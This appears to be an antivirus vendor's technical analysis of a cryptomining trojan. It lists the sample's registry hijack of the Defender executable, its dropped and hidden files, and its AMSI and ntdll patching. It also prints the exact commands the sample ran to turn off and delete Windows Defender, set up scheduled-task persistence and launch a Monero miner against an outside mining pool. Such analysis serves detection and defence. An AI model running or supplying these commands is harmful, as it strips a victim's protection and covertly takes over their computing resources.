Trojan.BtcMine.3955

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe] 'Debugger' = 'systray.exe'

Creates or modifies the following files

<SYSTEM32>\tasks\<File name>

Malicious functions

To complicate detection of its presence in the operating system,

blocks execution of the following system utilities:

Windows Defender

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableBlockAtF...

Patches code

in AMSI dll

glozqb.exe process, Amsi.dll module

in NTDLL dll

glozqb.exe process, ntdll.dll module

Modifies file system

Creates the following files

%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\appxprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\assocprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\cbsprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\dismcore.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\dismcoreps.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\dismhost.exe
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\dismprov.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\dmiprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\appxprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\assocprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\cbsprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\dismcore.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\dismprov.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\dmiprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\ffuprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\folderprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\genericprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\ibsprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\imagingprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\intlprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\logprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\msiprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\offlinesetupprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\osprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\provprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\setupplatformprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\smiprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\sysprepprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\transmogprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\unattendprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\vhdprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\en-us\wimprovider.dll.mui
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\ffuprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\folderprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\genericprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\ibsprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\imagingprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\intlprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\logprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\msiprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\offlinesetupprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\osprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\provprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\setupplatformprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\smiprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\sysprepprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\transmogprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\unattendprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\vhdprovider.dll
%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\wimprovider.dll
%TEMP%\32185167079540d6b4a77baf7474b048.xml
%APPDATA%\microsoft\windows\templates\servicehub\<File name>.exe
%TEMP%\651bd6347cc642d0b332649f89ca666b.xml
%TEMP%\mscorsvw_70a67217\svchost.exe
%TEMP%\836b24876528405c9a14c7acaf43df90.xml
%TEMP%\f448fc3c2fcd495798d3cdd8e6649b0f.xml
%TEMP%\dde6dda560c142a9a189d7450f63fdb8.xml
%TEMP%\bbd6ca13f1484ed8b1eac1b966e77322.xml
%TEMP%\05a859d694bb4497808a2885ee3082cd.xml
%TEMP%\bf5fc9edba44462eafd9f1d381b820e7.xml
%TEMP%\1ee3995d9f9d418da777f73951db3fd3.xml

Sets the 'hidden' attribute to the following files

<Full path to file>
%APPDATA%\microsoft\windows\templates\servicehub\<File name>.exe
%TEMP%\mscorsvw_70a67217\svchost.exe

Deletes following files that it created itself

%TEMP%\32185167079540d6b4a77baf7474b048.xml
%TEMP%\651bd6347cc642d0b332649f89ca666b.xml
%TEMP%\836b24876528405c9a14c7acaf43df90.xml
%TEMP%\f448fc3c2fcd495798d3cdd8e6649b0f.xml
%TEMP%\dde6dda560c142a9a189d7450f63fdb8.xml
%TEMP%\bbd6ca13f1484ed8b1eac1b966e77322.xml
%TEMP%\05a859d694bb4497808a2885ee3082cd.xml
%TEMP%\bf5fc9edba44462eafd9f1d381b820e7.xml
%TEMP%\1ee3995d9f9d418da777f73951db3fd3.xml

Network activity

UDP

DNS ASK po##.#ashvault.pro

Miscellaneous

Creates and executes the following

'%TEMP%\40e330a7-1188-43b5-9db7-22f71fc9a450\dismhost.exe' {4ABE7761-7BDF-4D7B-89BF-6D5DD2AE5188}
'%TEMP%\mscorsvw_70a67217\svchost.exe' -o stratum+tcp://pool.hashvault.pro:443 -u 48wEMnj5xwK4uJamMoKW8Xdh9ibQUh4uV8nL7cXyktGZeFhnKHbTJM43Yy9YVbXNvhXjuiHNY6ecY38oXbpRjFiTSdHhiwC -p x --coin monero --cpu-max-threads-hint 70 --no-colo...

Executes the following

'<SYSTEM32>\dism.exe' /online /disable-feature /featurename:Windows-Defender /Remove /NoRestart
'<SYSTEM32>\sc.exe' delete WinDefend
'<SYSTEM32>\sc.exe' delete WdNisSvc
'<SYSTEM32>\sc.exe' delete Sense
'<SYSTEM32>\sc.exe' delete WdBoot
'<SYSTEM32>\sc.exe' delete WdFilter
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\32185167079540d6b4a77baf7474b048.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\651bd6347cc642d0b332649f89ca666b.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\836b24876528405c9a14c7acaf43df90.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\f448fc3c2fcd495798d3cdd8e6649b0f.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\dde6dda560c142a9a189d7450f63fdb8.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\bbd6ca13f1484ed8b1eac1b966e77322.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\05a859d694bb4497808a2885ee3082cd.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\bf5fc9edba44462eafd9f1d381b820e7.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\1ee3995d9f9d418da777f73951db3fd3.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\8cd44ba3d36948819f600d6a0bd72624.xml" /F
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\9bae45fc08a84864b1d0fba3f65d6b69.xml" /F
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableBlockAtF...' (with hidden window)
'<SYSTEM32>\dism.exe' /online /disable-feature /featurename:Windows-Defender /Remove /NoRestart' (with hidden window)
'<SYSTEM32>\sc.exe' delete WinDefend' (with hidden window)
'<SYSTEM32>\sc.exe' delete WdNisSvc' (with hidden window)
'<SYSTEM32>\sc.exe' delete Sense' (with hidden window)
'<SYSTEM32>\sc.exe' delete WdBoot' (with hidden window)
'<SYSTEM32>\sc.exe' delete WdFilter' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\32185167079540d6b4a77baf7474b048.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\651bd6347cc642d0b332649f89ca666b.xml" /F' (with hidden window)
'%TEMP%\mscorsvw_70a67217\svchost.exe' -o stratum+tcp://pool.hashvault.pro:443 -u 48wEMnj5xwK4uJamMoKW8Xdh9ibQUh4uV8nL7cXyktGZeFhnKHbTJM43Yy9YVbXNvhXjuiHNY6ecY38oXbpRjFiTSdHhiwC -p x --coin monero --cpu-max-threads-hint 70 --no-colo...' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\836b24876528405c9a14c7acaf43df90.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\f448fc3c2fcd495798d3cdd8e6649b0f.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\dde6dda560c142a9a189d7450f63fdb8.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\bbd6ca13f1484ed8b1eac1b966e77322.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\05a859d694bb4497808a2885ee3082cd.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\bf5fc9edba44462eafd9f1d381b820e7.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\1ee3995d9f9d418da777f73951db3fd3.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\8cd44ba3d36948819f600d6a0bd72624.xml" /F' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN "<File name>" /XML "%TEMP%\9bae45fc08a84864b1d0fba3f65d6b69.xml" /F' (with hidden window)

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial